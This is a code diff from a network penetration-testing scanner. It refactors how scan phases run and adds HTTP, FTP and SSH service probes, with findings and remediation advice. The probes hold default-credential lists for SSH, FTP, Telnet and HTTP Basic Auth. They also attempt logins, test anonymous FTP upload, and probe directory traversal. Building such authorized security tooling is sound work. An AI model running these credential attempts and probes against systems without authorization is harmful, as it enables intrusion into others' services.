FINGERPRINT_HTTP_TIMEOUT, FINGERPRINT_NUDGE_TIMEOUT, SCAN_PORT_TIMEOUT, COMMON_PORTS, ALL_PORTS, + NETWORK_FEATURE_METHODS, NETWORK_FEATURE_REGISTRY, ) -from .web_mixin import _WebTestsMixin +from .web import _WebTestsMixin -from .metrics_collector import MetricsCollector +# Note: MetricsCollector is no longer imported directly — it's initialized +# by BaseLocalWorker.__init__() via worker/base.py. class PentestLocalWorker( _ServiceInfoMixin, _WebTestsMixin, _CorrelationMixin, + BaseLocalWorker, ): + FEATURE_CATEGORIES = ("service", "web", "correlation") + FEATURE_CATEGORY_PREFIXES = { + "service": "_service_info_", + "web": "_web_test_", + "correlation": "_post_scan_", + } + PHASE_EXECUTION_PLAN = ( + {"phase": "port_scan", "runner": "_scan_ports_step"}, + {"phase": "fingerprint", "runner": "_active_fingerprint_ports", "completion_marker": "fingerprint_completed"}, + {"phase": "service_probes", "runner": "_gather_service_info", "completion_marker": "service_info_completed"}, + {"phase": "web_tests", "runner": "_run_web_tests", "completion_marker": "web_tests_completed", "skip_on_ics": True}, + {"phase": "correlation", "runner": "_run_correlation_tests", "completion_marker": "correlation_completed"}, + ) + """ Execute a pentest workflow against a target on a dedicated thread. @@ -111,13 +129,16 @@ def __init__( if exceptions is None: exceptions = [] - self.target = target - self.job_id = job_id - self.initiator = initiator - self.local_worker_id = "RM-{}-{}".format( - local_id_prefix, str(uuid.uuid4())[:4] + # Initialize base class — sets owner, job_id, initiator, target, + # local_worker_id, thread, stop_event, metrics, initial_ports, state + super().__init__( + owner=owner, + job_id=job_id, + initiator=initiator, + local_id_prefix=local_id_prefix, + target=target, ) - self.owner = owner + self.scan_min_delay = scan_min_delay self.scan_max_delay = scan_max_delay self.ics_safe_mode = ics_safe_mode @@ -175,7 +196,7 @@ def __init__( }, "correlation_findings": [], } - self.metrics = MetricsCollector() + # Note: self.metrics already set by super().__init__() self.__all_features = self._get_all_features() @@ -203,15 +224,51 @@ def _get_all_features(self, categs=False): dict | list Service and web test method names. """ - features = {} if categs else [] - PREFIXES = ["_service_info_", "_web_test_"] - for prefix in PREFIXES: - methods = [method for method in dir(self) if method.startswith(prefix)] - if categs: - features[prefix[1:-1]] = methods - else: - features.extend(methods) - return features + if categs: + return { + category: list(self.get_feature_registry().get(category, ())) + for category in self.get_feature_categories() + } + return list(self.get_feature_methods()) + + @classmethod + def get_feature_categories(cls): + """Return feature categories used by the network worker.""" + return list(cls.FEATURE_CATEGORIES) + + @classmethod + def get_feature_registry(cls): + """Return the explicit executable feature registry for network scans.""" + return {category: list(NETWORK_FEATURE_REGISTRY.get(category, ())) for category in cls.get_feature_categories()} + + @classmethod + def get_feature_methods(cls): + """Return the flattened ordered feature list for network scans.""" + return list(NETWORK_FEATURE_METHODS) + + @classmethod + def get_supported_features(cls, categs=False): + """Return supported network-worker features from the explicit registry.""" + if categs: + return cls.get_feature_registry() + return cls.get_feature_methods() + + def _get_enabled_feature_methods(self, category=None): + """Return enabled features in explicit registry order, optionally by category.""" + allowed = set(self.__enabled_features or []) + if category is None: + methods = self.get_feature_methods() + else: + methods = self.get_feature_registry().get(category, []) + enabled = [method for method in methods if method in allowed] + if category is not None: + prefix = self.FEATURE_CATEGORY_PREFIXES[category] + extras = [ + method for method in (self.__enabled_features or []) + if method not in methods and method.startswith(prefix) + ] + enabled.extend(extras) + return enabled @staticmethod def get_worker_specific_result_fields(): @@ -302,67 +359,8 @@ def get_status(self, for_aggregations=False): return dct_status - def P(self, s, **kwargs): - """ - Log a message with worker context prefix. - - Parameters - ---------- - s : str - Message to emit. - **kwargs - Additional logging keyword arguments. - - Returns - ------- - Any - Result of owner logger. - """ - s = f"[{self.local_worker_id}:{self.target}] {s}" - self.owner.P(s, **kwargs) - return - - - def start(self): - """ - Start the pentest job in a new thread. - - Returns - ------- - None - """ - # Event to signal early stopping - self.stop_event = threading.Event() - # Thread for running the job - self.thread = threading.Thread(target=self.execute_job, daemon=True) - self.thread.start() - return - - - def stop(self): - """ - Signal the job to stop early. - - Returns - ------- - None - """ - self.P(f"Stop requested for job {self.job_id} on worker {self.local_worker_id}") - self.stop_event.set() - return - - - def _check_stopped(self): - """ - Determine whether the worker should cease execution. - - Returns - ------- - bool - True if done or stop event set. - """ - return self.state["done"] or self.stop_event.is_set() - + # start(), stop(), _check_stopped(), P() are ALL inherited from + # BaseLocalWorker. Not redefined here. def _interruptible_sleep(self): """ @@ -382,6 +380,43 @@ def _interruptible_sleep(self): # Check if stop was requested during sleep return self.stop_event.is_set() + def _execute_phase(self, phase_config): + """Execute one worker phase with standardized metrics and completion handling.""" + if self._check_stopped(): + return + if phase_config.get("skip_on_ics") and self._ics_detected: + return + + phase_name = phase_config["phase"] + runner = getattr(self, phase_config["runner"]) + self.metrics.phase_start(phase_name) + try: + runner() + finally: + self.metrics.phase_end(phase_name) + + completion_marker = phase_config.get("completion_marker") + if completion_marker: + self.state["completed_tests"].append(completion_marker) + + def _run_correlation_tests(self): + """Execute enabled correlation probes in explicit registry order.""" + enabled_methods = self._get_enabled_feature_methods(category="correlation") + enabled_set = set(enabled_methods) + + for method in self.get_feature_registry().get("correlation", []): + if method not in enabled_set: + self.metrics.record_probe(method, "skipped:disabled") + + for method in enabled_methods: + if self.stop_event.is_set(): + return + try: + getattr(self, method)() + self.metrics.record_probe(method, "completed") + except Exception as exc: + self.P(f"Correlation probe {method} failed: {exc}", color='r') + self.metrics.record_probe(method, "failed") def execute_job(self): """ @@ -395,35 +430,8 @@ def execute_job(self): try: self.P(f"Starting pentest job.") self.metrics.start_scan(len(self.initial_ports)) - - if not self._check_stopped(): - self.metrics.phase_start("port_scan") - self._scan_ports_step() - self.metrics.phase_end("port_scan") - - if not self._check_stopped(): - self.metrics.phase_start("fingerprint") - self._active_fingerprint_ports() - self.metrics.phase_end("fingerprint") - self.state["completed_tests"].append("fingerprint_completed") - - if not self._check_stopped(): - self.metrics.phase_start("service_probes") - self._gather_service_info() - self.metrics.phase_end("service_probes") - self.state["completed_tests"].append("service_info_completed") - - if not self._check_stopped() and not self._ics_detected: - self.metrics.phase_start("web_tests") - self._run_web_tests() - self.metrics.phase_end("web_tests") - self.state["completed_tests"].append("web_tests_completed") - - if not self._check_stopped(): - self.metrics.phase_start("correlation") - self._post_scan_correlate() - self.metrics.phase_end("correlation") - self.state["completed_tests"].append("correlation_completed") + for phase_config in self.PHASE_EXECUTION_PLAN: + self._execute_phase(phase_config) self.state['done'] = True self.P(f"Job completed. Ports open and checked: {self.state['open_ports']}") @@ -933,7 +941,7 @@ def _gather_service_info(self): return self.P(f"Gathering service info for {len(open_ports)} open ports.") target = self.target - service_info_methods = [m for m in self.__enabled_features if m.startswith("_service_info_")] + service_info_methods = self._get_enabled_feature_methods(category="service") port_protocols = self.state.get("port_protocols", {}) aggregated_info = [] for method in service_info_methods: @@ -943,6 +951,7 @@ def _gather_service_info(self): func = getattr(self, method) target_protocols = PROBE_PROTOCOL_MAP.get(method) # None → run unconditionally method_info = [] + method_failed = False for port in open_ports: if self.stop_event.is_set(): return @@ -952,7 +961,12 @@ def _gather_service_info(self): port_proto = port_protocols.get(port, "unknown") if port_proto not in target_protocols: continue - info = func(target, port) + try: + info = func(target, port) + except Exception as exc: + method_failed = True + self.P(f"Service probe {method} failed on port {port}: {exc}", color='r') + continue if info is not None: if port not in self.state["service_info"]: self.state["service_info"][port] = {} @@ -993,7 +1007,7 @@ def _gather_service_info(self): f"Method {method} findings:\n{json.dumps(method_info, indent=2)}" ) self.state["completed_tests"].append(method) - self.metrics.record_probe(method, "completed") + self.metrics.record_probe(method, "failed" if method_failed else "completed") # end for each method return aggregated_info @@ -1027,13 +1041,19 @@ def _run_web_tests(self): ) target = self.target result = [] - web_tests_methods = [m for m in self.__enabled_features if m.startswith("_web_test_")] + web_tests_methods = self._get_enabled_feature_methods(category="web") for method in web_tests_methods: func = getattr(self, method) + method_failed = False for port in ports_to_test: if self.stop_event.is_set(): return - iter_result = func(target, port) + try: + iter_result = func(target, port) + except Exception as exc: + method_failed = True + self.P(f"Web probe {method} failed on port {port}: {exc}", color='r') + continue if iter_result is not None: result.append(f"{method}:{port} {iter_result}") if port not in self.state["web_tests_info"]: @@ -1050,7 +1070,7 @@ def _run_web_tests(self): return # Stop was requested during sleep # end for each port of current method self.state["completed_tests"].append(method) # register completed method for port - self.metrics.record_probe(method, "completed") + self.metrics.record_probe(method, "failed" if method_failed else "completed") # end for each method self.state["web_tested"] = True return result diff --git a/extensions/business/cybersec/red_mesh/worker/service/__init__.py b/extensions/business/cybersec/red_mesh/worker/service/__init__.py new file mode 100644 index 00000000..2602748c --- /dev/null +++ b/extensions/business/cybersec/red_mesh/worker/service/__init__.py @@ -0,0 +1,15 @@ +from ._base import _ServiceProbeBase +from .common import _ServiceCommonMixin +from .database import _ServiceDatabaseMixin +from .infrastructure import _ServiceInfraMixin +from .tls import _ServiceTlsMixin + + +class _ServiceInfoMixin( + _ServiceCommonMixin, + _ServiceDatabaseMixin, + _ServiceInfraMixin, + _ServiceTlsMixin, +): + """Combined service probes mixin.""" + pass diff --git a/extensions/business/cybersec/red_mesh/worker/service/_base.py b/extensions/business/cybersec/red_mesh/worker/service/_base.py new file mode 100644 index 00000000..383f55b2 --- /dev/null +++ b/extensions/business/cybersec/red_mesh/worker/service/_base.py @@ -0,0 +1,25 @@ +from ...findings import Finding, Severity, probe_result, probe_error +from ...cve_db import check_cves + + +class _ServiceProbeBase: + """ + Base mixin providing shared utilities for service probe sub-mixins. + + Subclasses inherit ``_emit_metadata`` for recording scan metadata and + have direct access to the ``findings``, ``cve_db`` helpers via module- + level imports. + """ + + def _emit_metadata(self, category, key_or_item, value=None): + """Safely append to scan_metadata sub-dicts without crashing if state is uninitialized.""" + meta = self.state.get("scan_metadata") + if meta is None: + return + bucket = meta.get(category) + if bucket is None: + return + if isinstance(bucket, dict): + bucket[key_or_item] = value + elif isinstance(bucket, list): + bucket.append(key_or_item) diff --git a/extensions/business/cybersec/red_mesh/worker/service/common.py b/extensions/business/cybersec/red_mesh/worker/service/common.py new file mode 100644 index 00000000..4b32f601 --- /dev/null +++ b/extensions/business/cybersec/red_mesh/worker/service/common.py @@ -0,0 +1,1716 @@ +import random +import re as _re +import socket +import struct +import ftplib +import requests +import ssl +from datetime import datetime + +import paramiko + +from ...findings import Finding, Severity, probe_result, probe_error +from ...cve_db import check_cves +from ._base import _ServiceProbeBase + +# Default credentials commonly found on exposed SSH services. +# Kept intentionally small — this is a quick check, not a brute-force. +_SSH_DEFAULT_CREDS = [ + ("root", "root"), + ("root", "toor"), + ("root", "password"), + ("admin", "admin"), + ("admin", "password"), + ("user", "user"), + ("test", "test"), +] + +# Default credentials for FTP services. +_FTP_DEFAULT_CREDS = [ + ("root", "root"), + ("admin", "admin"), + ("admin", "password"), + ("ftp", "ftp"), + ("user", "user"), + ("test", "test"), +] + +# Default credentials for Telnet services. +_TELNET_DEFAULT_CREDS = [ + ("root", "root"), + ("root", "toor"), + ("root", "password"), + ("admin", "admin"), + ("admin", "password"), + ("user", "user"), + ("test", "test"), +] + +_HTTP_SERVER_RE = _re.compile( + r'(Apache|nginx)[/ ]+(\d+(?:\.\d+)+)', _re.IGNORECASE, +) +_HTTP_PRODUCT_MAP = {'apache': 'apache', 'nginx': 'nginx'} + + +class _ServiceCommonMixin(_ServiceProbeBase): + """HTTP, FTP, SSH, SMTP, Telnet and Rsync service probes.""" + + def _service_info_http(self, target, port): # default port: 80 + """ + Assess HTTP service: server fingerprint, technology detection, + dangerous HTTP methods, and page title extraction. + + Parameters + ---------- + target : str + Hostname or IP address. + port : int + Port being probed. + + Returns + ------- + dict + Structured findings. + """ + import re as _re + + findings = [] + scheme = "https" if port in (443, 8443) else "http" + url = f"{scheme}://{target}" if port in (80, 443) else f"{scheme}://{target}:{port}" + + result = { + "banner": None, + "server": None, + "title": None, + "technologies": [], + "dangerous_methods": [], + } + + # --- 1. GET request — banner, server, title, tech fingerprint --- + try: + self.P(f"Fetching {url} for banner...") + ua = getattr(self, 'scanner_user_agent', '') + headers = {'User-Agent': ua} if ua else {} + resp = requests.get(url, timeout=5, verify=False, allow_redirects=True, headers=headers) + + result["banner"] = f"HTTP {resp.status_code} {resp.reason}" + result["server"] = resp.headers.get("Server") + if result["server"]: + self._emit_metadata("server_versions", port, result["server"]) + if result["server"]: + _m = _HTTP_SERVER_RE.search(result["server"]) + if _m: + _cve_product = _HTTP_PRODUCT_MAP.get(_m.group(1).lower()) + if _cve_product: + findings += check_cves(_cve_product, _m.group(2)) + powered_by = resp.headers.get("X-Powered-By") + + # Page title + title_match = _re.search( + r"(.*?)", resp.text[:5000], _re.IGNORECASE | _re.DOTALL + ) + if title_match: + result["title"] = title_match.group(1).strip()[:100] + + # Technology fingerprinting + body_lower = resp.text[:8000].lower() + tech_signatures = { + "WordPress": ["wp-content", "wp-includes"], + "Joomla": ["com_content", "/media/jui/"], + "Drupal": ["drupal.js", "sites/default/files"], + "Django": ["csrfmiddlewaretoken"], + "PHP": [".php", "phpsessid"], + "ASP.NET": ["__viewstate", ".aspx"], + "React": ["_next/", "__next_data__", "react"], + } + techs = [] + if result["server"]: + techs.append(result["server"]) + if powered_by: + techs.append(powered_by) + for tech, markers in tech_signatures.items(): + if any(m in body_lower for m in markers): + techs.append(tech) + result["technologies"] = techs + + except Exception as e: + # HTTP library failed (e.g. empty reply, connection reset). + # Fall back to raw socket probe — try HTTP/1.0 without Host header + # (some servers like nginx drop requests with unrecognized Host values). + try: + _s = socket.socket(socket.AF_INET, socket.SOCK_STREAM) + _s.settimeout(3) + _s.connect((target, port)) + # Use HTTP/1.0 without Host — matches nmap's GetRequest probe + _s.send(b"GET / HTTP/1.0\r\n\r\n") + _raw = b"" + while True: + chunk = _s.recv(4096) + if not chunk: + break + _raw += chunk + if len(_raw) > 16384: + break + _s.close() + _raw_str = _raw.decode("utf-8", errors="ignore") + if _raw_str: + lines = _raw_str.split("\r\n") + result["banner"] = lines[0].strip() if lines else "unknown" + for line in lines[1:]: + low = line.lower() + if low.startswith("server:"): + result["server"] = line.split(":", 1)[1].strip() + break + # Report that the server drops Host-header requests + findings.append(Finding( + severity=Severity.INFO, + title="HTTP service drops requests with Host header", + description=f"TCP port {port} returns empty replies for standard HTTP/1.1 " + "requests but responds to HTTP/1.0 without a Host header. " + "This indicates a server_name mismatch or intentional filtering.", + evidence=f"HTTP/1.1 with Host:{target} → empty reply; " + f"HTTP/1.0 without Host → {result['banner']}", + remediation="Configure a proper default server block or virtual host.", + cwe_id="CWE-200", + confidence="certain", + )) + # Check for directory listing in response body + body_start = _raw_str.find("\r\n\r\n") + if body_start > -1: + body = _raw_str[body_start + 4:] + if "directory listing" in body.lower() or "
  • (.*?)", body[:5000], _re.IGNORECASE | _re.DOTALL) + if title_m: + result["title"] = title_m.group(1).strip()[:100] + else: + result["banner"] = "(empty reply)" + findings.append(Finding( + severity=Severity.INFO, + title="HTTP service returns empty reply", + description=f"TCP port {port} accepts connections but the server " + "closes without sending any HTTP response data.", + evidence=f"Raw socket to {target}:{port} — connected OK, received 0 bytes.", + remediation="Investigate why the server sends empty replies; " + "verify proxy/upstream configuration.", + cwe_id="CWE-200", + confidence="certain", + )) + except Exception: + return probe_error(target, port, "HTTP", e) + return probe_result(raw_data=result, findings=findings) + + # --- 2. Dangerous HTTP methods --- + dangerous = [] + for method in ("TRACE", "PUT", "DELETE"): + try: + r = requests.request(method, url, timeout=3, verify=False) + if r.status_code < 400: + dangerous.append(method) + except Exception: + pass + + result["dangerous_methods"] = dangerous + if "TRACE" in dangerous: + findings.append(Finding( + severity=Severity.MEDIUM, + title="HTTP TRACE method enabled (cross-site tracing / XST attack vector).", + description="TRACE echoes request bodies back, enabling cross-site tracing attacks.", + evidence=f"TRACE {url} returned status < 400.", + remediation="Disable the TRACE method in the web server configuration.", + owasp_id="A05:2021", + cwe_id="CWE-693", + confidence="certain", + )) + if "PUT" in dangerous: + findings.append(Finding( + severity=Severity.HIGH, + title="HTTP PUT method enabled (potential unauthorized file upload).", + description="The PUT method allows uploading files to the server.", + evidence=f"PUT {url} returned status < 400.", + remediation="Disable the PUT method or restrict it to authenticated users.", + owasp_id="A01:2021", + cwe_id="CWE-749", + confidence="certain", + )) + if "DELETE" in dangerous: + findings.append(Finding( + severity=Severity.HIGH, + title="HTTP DELETE method enabled (potential unauthorized file deletion).", + description="The DELETE method allows removing resources from the server.", + evidence=f"DELETE {url} returned status < 400.", + remediation="Disable the DELETE method or restrict it to authenticated users.", + owasp_id="A01:2021", + cwe_id="CWE-749", + confidence="certain", + )) + + return probe_result(raw_data=result, findings=findings) + + + def _service_info_http_alt(self, target, port): # default port: 8080 + """ + Probe alternate HTTP port 8080 for verbose banners. + + Parameters + ---------- + target : str + Hostname or IP address. + port : int + Port being probed. + + Returns + ------- + dict + Structured findings. + """ + # Skip standard HTTP ports — they are covered by _service_info_http. + if port in (80, 443): + return None + + findings = [] + raw = {"banner": None, "server": None} + try: + sock = socket.socket(socket.AF_INET, socket.SOCK_STREAM) + sock.settimeout(2) + sock.connect((target, port)) + ua = getattr(self, 'scanner_user_agent', '') + ua_header = f"\r\nUser-Agent: {ua}" if ua else "" + msg = "HEAD / HTTP/1.1\r\nHost: {}{}\r\n\r\n".format(target, ua_header).encode('utf-8') + sock.send(bytes(msg)) + data = sock.recv(1024).decode('utf-8', errors='ignore') + sock.close() + + if data: + # Extract status line and Server header instead of dumping raw bytes + lines = data.split("\r\n") + status_line = lines[0].strip() if lines else "unknown" + raw["banner"] = status_line + for line in lines[1:]: + if line.lower().startswith("server:"): + raw["server"] = line.split(":", 1)[1].strip() + break + + # NOTE: CVE matching intentionally omitted here — _service_info_http + # already handles CVE lookups for all HTTP ports. Emitting them here + # caused duplicate findings on non-standard ports (batch 3 dedup fix). + except Exception as e: + return probe_error(target, port, "HTTP-ALT", e) + return probe_result(raw_data=raw, findings=findings) + + + def _service_info_https(self, target, port): # default port: 443 + """ + Collect HTTPS response banner data for TLS services. + + Parameters + ---------- + target : str + Hostname or IP address. + port : int + Port being probed. + + Returns + ------- + dict + Structured findings. + """ + findings = [] + raw = {"banner": None, "server": None} + try: + url = f"https://{target}" + if port != 443: + url = f"https://{target}:{port}" + self.P(f"Fetching {url} for banner...") + ua = getattr(self, 'scanner_user_agent', '') + headers = {'User-Agent': ua} if ua else {} + resp = requests.get(url, timeout=3, verify=False, headers=headers) + raw["banner"] = f"HTTPS {resp.status_code} {resp.reason}" + raw["server"] = resp.headers.get("Server") + if raw["server"]: + _m = _HTTP_SERVER_RE.search(raw["server"]) + if _m: + _cve_product = _HTTP_PRODUCT_MAP.get(_m.group(1).lower()) + if _cve_product: + findings += check_cves(_cve_product, _m.group(2)) + findings.append(Finding( + severity=Severity.INFO, + title=f"HTTPS service detected ({resp.status_code} {resp.reason})", + description=f"HTTPS service on {target}:{port}.", + evidence=f"Server: {raw['server'] or 'not disclosed'}", + confidence="certain", + )) + except Exception as e: + return probe_error(target, port, "HTTPS", e) + return probe_result(raw_data=raw, findings=findings) + + + # Default credentials for HTTP Basic Auth testing + _HTTP_BASIC_CREDS = [ + ("admin", "admin"), ("admin", "password"), ("admin", "1234"), + ("root", "root"), ("root", "password"), ("root", "toor"), + ("user", "user"), ("test", "test"), ("guest", "guest"), + ("admin", ""), ("tomcat", "tomcat"), ("manager", "manager"), + ] + + def _service_info_http_basic_auth(self, target, port): + """ + Test HTTP Basic Auth endpoints for default/weak credentials. + + Only runs when the target responds with 401 + WWW-Authenticate: Basic. + Tests a small set of default credential pairs. + + Parameters + ---------- + target : str + Hostname or IP address. + port : int + Port being probed. + + Returns + ------- + dict or None + Structured findings, or None if no Basic Auth detected. + """ + findings = [] + raw = {"basic_auth_detected": False, "tested": 0, "accepted": []} + scheme = "https" if port in (443, 8443) else "http" + base_url = f"{scheme}://{target}" if port in (80, 443) else f"{scheme}://{target}:{port}" + + # Probe / and /admin for 401 + Basic auth + auth_url = None + realm = None + for path in ("/", "/admin", "/manager"): + try: + resp = requests.get(base_url + path, timeout=3, verify=False) + if resp.status_code == 401: + www_auth = resp.headers.get("WWW-Authenticate", "") + if "Basic" in www_auth: + auth_url = base_url + path + realm_match = _re.search(r'realm="?([^"]*)"?', www_auth, _re.IGNORECASE) + realm = realm_match.group(1) if realm_match else "unknown" + break + except Exception: + continue + + if not auth_url: + return None # No Basic auth detected — skip entirely + + raw["basic_auth_detected"] = True + raw["realm"] = realm + + # Test credentials + consecutive_401 = 0 + for username, password in self._HTTP_BASIC_CREDS: + try: + resp = requests.get(auth_url, timeout=3, verify=False, auth=(username, password)) + raw["tested"] += 1 + + if resp.status_code == 429: + break # rate limited — stop + + if resp.status_code == 200 or resp.status_code == 301 or resp.status_code == 302: + cred_str = f"{username}:{password}" if password else f"{username}:(empty)" + raw["accepted"].append(cred_str) + findings.append(Finding( + severity=Severity.CRITICAL, + title=f"HTTP Basic Auth default credential: {cred_str}", + description=f"The web server at {auth_url} (realm: {realm}) accepted a default credential.", + evidence=f"GET {auth_url} with {cred_str} → HTTP {resp.status_code}", + remediation="Change default credentials immediately.", + owasp_id="A07:2021", + cwe_id="CWE-798", + confidence="certain", + )) + elif resp.status_code == 401: + consecutive_401 += 1 + except Exception: + break + + # No rate limiting after all attempts + if consecutive_401 >= len(self._HTTP_BASIC_CREDS) - 1: + findings.append(Finding( + severity=Severity.MEDIUM, + title=f"HTTP Basic Auth has no rate limiting ({raw['tested']} attempts accepted)", + description="The server does not rate-limit failed authentication attempts.", + evidence=f"{consecutive_401} consecutive 401 responses without rate limiting.", + remediation="Implement account lockout or rate limiting for failed auth attempts.", + owasp_id="A07:2021", + cwe_id="CWE-307", + confidence="firm", + )) + + return probe_result(raw_data=raw, findings=findings) + + + def _service_info_ftp(self, target, port): # default port: 21 + """ + Assess FTP service security: banner, anonymous access, default creds, + server fingerprint, TLS support, write access, and credential validation. + + Checks performed (in order): + + 1. Banner grab and SYST/FEAT fingerprint. + 2. Anonymous login attempt. + 3. Write access test (STOR) after anonymous login. + 4. Directory listing and traversal. + 5. TLS support check (AUTH TLS). + 6. Default credential check. + 7. Arbitrary credential acceptance test. + + Parameters + ---------- + target : str + Hostname or IP address. + port : int + Port being probed. + + Returns + ------- + dict + Structured findings with banner, vulnerabilities, server_info, etc. + """ + findings = [] + result = { + "banner": None, + "server_type": None, + "features": [], + "anonymous_access": False, + "write_access": False, + "tls_supported": False, + "accepted_credentials": [], + "directory_listing": None, + } + + def _ftp_connect(user=None, passwd=None): + """Open a fresh FTP connection and optionally login.""" + ftp = ftplib.FTP(timeout=5) + ftp.connect(target, port, timeout=5) + if user is not None: + ftp.login(user, passwd or "") + return ftp + + # --- 1. Banner grab --- + try: + ftp = _ftp_connect() + result["banner"] = ftp.getwelcome() + except Exception as e: + return probe_error(target, port, "FTP", e) + + # FTP server version CVE check + _ftp_m = _re.search( + r'(ProFTPD|vsftpd)[/ ]+(\d+(?:\.\d+)+)', + result["banner"], _re.IGNORECASE, + ) + if _ftp_m: + _cve_product = {'proftpd': 'proftpd', 'vsftpd': 'vsftpd'}.get(_ftp_m.group(1).lower()) + if _cve_product: + findings += check_cves(_cve_product, _ftp_m.group(2)) + + # --- 2. Anonymous login --- + try: + resp = ftp.login() + result["anonymous_access"] = True + findings.append(Finding( + severity=Severity.HIGH, + title="FTP allows anonymous login.", + description="The FTP server permits unauthenticated access via anonymous login.", + evidence="Anonymous login succeeded.", + remediation="Disable anonymous FTP access unless explicitly required.", + owasp_id="A07:2021", + cwe_id="CWE-287", + confidence="certain", + )) + except Exception: + # Anonymous failed — close and move on to credential tests + try: + ftp.quit() + except Exception: + pass + ftp = None + + # --- 2b. SYST / FEAT (after login — some servers require auth first) --- + if ftp: + try: + syst = ftp.sendcmd("SYST") + result["server_type"] = syst + except Exception: + pass + + try: + feat_resp = ftp.sendcmd("FEAT") + feats = [ + line.strip() for line in feat_resp.split("\n") + if line.strip() and not line.startswith("211") + ] + result["features"] = feats + except Exception: + pass + + # --- 2c. PASV IP leak check --- + if ftp and result["anonymous_access"]: + try: + pasv_resp = ftp.sendcmd("PASV") + _pasv_match = _re.search(r'\((\d+),(\d+),(\d+),(\d+),(\d+),(\d+)\)', pasv_resp) + if _pasv_match: + pasv_ip = f"{_pasv_match.group(1)}.{_pasv_match.group(2)}.{_pasv_match.group(3)}.{_pasv_match.group(4)}" + if pasv_ip != target: + import ipaddress as _ipaddress + try: + if _ipaddress.ip_address(pasv_ip).is_private: + result["pasv_ip"] = pasv_ip + self._emit_metadata("internal_ips", {"ip": pasv_ip, "source": f"ftp_pasv:{port}"}) + findings.append(Finding( + severity=Severity.MEDIUM, + title=f"FTP PASV leaks internal IP: {pasv_ip}", + description=f"PASV response reveals RFC1918 address {pasv_ip}, different from target {target}.", + evidence=f"PASV response: {pasv_resp}", + remediation="Configure FTP passive address masquerading to use the public IP.", + owasp_id="A05:2021", + cwe_id="CWE-200", + confidence="certain", + )) + except (ValueError, TypeError): + pass + except Exception: + pass + + # --- 3. Write access test (only if anonymous login succeeded) --- + if ftp and result["anonymous_access"]: + import io + try: + ftp.set_pasv(True) + test_data = io.BytesIO(b"RedMesh write access probe") + resp = ftp.storbinary("STOR __redmesh_probe.txt", test_data) + if resp and resp.startswith("226"): + result["write_access"] = True + findings.append(Finding( + severity=Severity.CRITICAL, + title="FTP anonymous write access enabled (file upload possible).", + description="Anonymous users can upload files to the FTP server.", + evidence="STOR command succeeded with anonymous session.", + remediation="Remove write permissions for anonymous FTP users.", + owasp_id="A01:2021", + cwe_id="CWE-434", + confidence="certain", + )) + try: + ftp.delete("__redmesh_probe.txt") + except Exception: + pass + except Exception: + pass + + # --- 4. Directory listing and traversal --- + if ftp: + try: + pwd = ftp.pwd() + files = [] + try: + ftp.retrlines("LIST", files.append) + except Exception: + pass + if files: + result["directory_listing"] = files[:20] + except Exception: + pass + + # Check if CWD allows directory traversal + for test_dir in ["/etc", "/var", ".."]: + try: + resp = ftp.cwd(test_dir) + if resp and (resp.startswith("250") or resp.startswith("200")): + findings.append(Finding( + severity=Severity.HIGH, + title=f"FTP directory traversal: CWD to '{test_dir}' succeeded.", + description="The FTP server allows changing to directories outside the intended root.", + evidence=f"CWD '{test_dir}' returned: {resp}", + remediation="Restrict FTP users to their home directory (chroot).", + owasp_id="A01:2021", + cwe_id="CWE-22", + confidence="certain", + )) + break + except Exception: + pass + try: + ftp.cwd("/") + except Exception: + pass + + if ftp: + try: + ftp.quit() + except Exception: + pass + + # --- 5. TLS support check --- + try: + ftp_tls = _ftp_connect() + resp = ftp_tls.sendcmd("AUTH TLS") + if resp.startswith("234"): + result["tls_supported"] = True + try: + ftp_tls.quit() + except Exception: + pass + except Exception: + if not result["tls_supported"]: + findings.append(Finding( + severity=Severity.MEDIUM, + title="FTP does not support TLS encryption (cleartext credentials).", + description="Credentials and data are transmitted in cleartext over the network.", + evidence="AUTH TLS command rejected or not supported.", + remediation="Enable FTPS (AUTH TLS) or migrate to SFTP.", + owasp_id="A02:2021", + cwe_id="CWE-319", + confidence="certain", + )) + + # --- 6. Default credential check --- + for user, passwd in _FTP_DEFAULT_CREDS: + try: + ftp_cred = _ftp_connect(user, passwd) + result["accepted_credentials"].append(f"{user}:{passwd}") + findings.append(Finding( + severity=Severity.CRITICAL, + title=f"FTP default credential accepted: {user}:{passwd}", + description="The FTP server accepted a well-known default credential.", + evidence=f"Accepted credential: {user}:{passwd}", + remediation="Change default passwords and enforce strong credential policies.", + owasp_id="A07:2021", + cwe_id="CWE-798", + confidence="certain", + )) + try: + ftp_cred.quit() + except Exception: + pass + except (ftplib.error_perm, ftplib.error_reply): + pass + except Exception: + pass + + # --- 7. Arbitrary credential acceptance test --- + import string as _string + ruser = "".join(random.choices(_string.ascii_lowercase, k=8)) + rpass = "".join(random.choices(_string.ascii_letters + _string.digits, k=12)) + try: + ftp_rand = _ftp_connect(ruser, rpass) + findings.append(Finding( + severity=Severity.CRITICAL, + title="FTP accepts arbitrary credentials", + description="Random credentials were accepted, indicating a dangerous misconfiguration or deceptive service.", + evidence=f"Accepted random creds {ruser}:{rpass}", + remediation="Investigate immediately — authentication is non-functional.", + owasp_id="A07:2021", + cwe_id="CWE-287", + confidence="certain", + )) + try: + ftp_rand.quit() + except Exception: + pass + except (ftplib.error_perm, ftplib.error_reply): + pass + except Exception: + pass + + return probe_result(raw_data=result, findings=findings) + + def _service_info_ssh(self, target, port): # default port: 22 + """ + Assess SSH service security: banner, auth methods, and default credentials. + + Checks performed (in order): + + 1. Banner grab — fingerprint server version. + 2. Auth method enumeration — identify if password auth is enabled. + 3. Default credential check — try a small list of common creds. + 4. Arbitrary credential acceptance test. + + Parameters + ---------- + target : str + Hostname or IP address. + port : int + Port being probed. + + Returns + ------- + dict + Structured findings with banner, auth_methods, and vulnerabilities. + """ + findings = [] + result = { + "banner": None, + "auth_methods": [], + } + + # --- 1. Banner grab (raw socket) --- + try: + sock = socket.socket(socket.AF_INET, socket.SOCK_STREAM) + sock.settimeout(3) + sock.connect((target, port)) + banner = sock.recv(1024).decode("utf-8", errors="ignore").strip() + sock.close() + result["banner"] = banner + # Emit OS claim from SSH banner (e.g. "SSH-2.0-OpenSSH_8.9p1 Ubuntu") + _os_match = _re.search(r'(Ubuntu|Debian|Fedora|CentOS|Alpine|FreeBSD)', banner, _re.IGNORECASE) + if _os_match: + self._emit_metadata("os_claims", f"ssh:{port}", _os_match.group(1)) + except Exception as e: + return probe_error(target, port, "SSH", e) + + # --- 2. Auth method enumeration via paramiko Transport --- + try: + transport = paramiko.Transport((target, port)) + transport.connect() + try: + transport.auth_none("") + except paramiko.BadAuthenticationType as e: + result["auth_methods"] = 